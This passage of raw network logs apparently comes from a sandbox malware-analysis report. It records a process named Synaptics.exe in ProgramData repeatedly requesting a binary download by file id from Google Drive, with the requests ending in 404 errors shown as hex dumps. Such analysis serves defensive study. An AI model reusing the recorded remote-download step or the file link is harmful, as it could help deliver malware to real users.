                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zLY_JPmrpZZDtPjU24Qn7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      29192.168.2.1149879172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-TnZJbMUdNflBo5sy8yMz3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      30192.168.2.1149892172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-woVSEX7XFTEIcVEvDXMNZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      31192.168.2.1149893142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:39 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:40 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6zQYTN8bv2zJTprVi6ZRzNdSwpBHX1NGA7GxtypyeKnfxWC32nG54grfxMVlAdad45
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-IfCEVruc-be_nQ8kd-CYNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:40 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:40 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 72 4e 54 4d 6e 6d 6f 79 46 65 73 65 57 72 61 6a 44 67 35 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="RrNTMnmoyFeseWrajDg5qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:40 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      32192.168.2.1149890172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Qvtp0Et9LBamYAD9Mz2_SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      33192.168.2.1149891142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:39 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:40 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5P3TtdNgmCESfsYsUZ3Usn0AU7rnQMPtkb-CTuZklLm3ZrbYWnoxOUxZf9BDXHAMPI
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-tpK_-y7RXQiaLrPEOxiMrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:40 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:40 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 53 5a 72 63 4b 4a 77 70 47 32 64 41 72 7a 79 6b 32 42 46 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="FSZrcKJwpG2dArzyk2BFZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:40 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      34192.168.2.1149902142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:40 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6arkfPGnYGasf2ukpJYMfO6ATQi4y9foiIMnpXv9pIK3h4OZgDzsUyCwSgS4TomXVP
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-82y_PJ99CVzlFqx5Y97ijQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 41 4a 69 68 7a 50 74 4c 5a 73 37 5a 38 4b 74 38 34 4e 44 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="iAJihzPtLZs7Z8Kt84NDQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      35192.168.2.1149900172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:40 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-u5JQWhr5NY4txj0-c3YlfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      36192.168.2.1149901172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:40 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
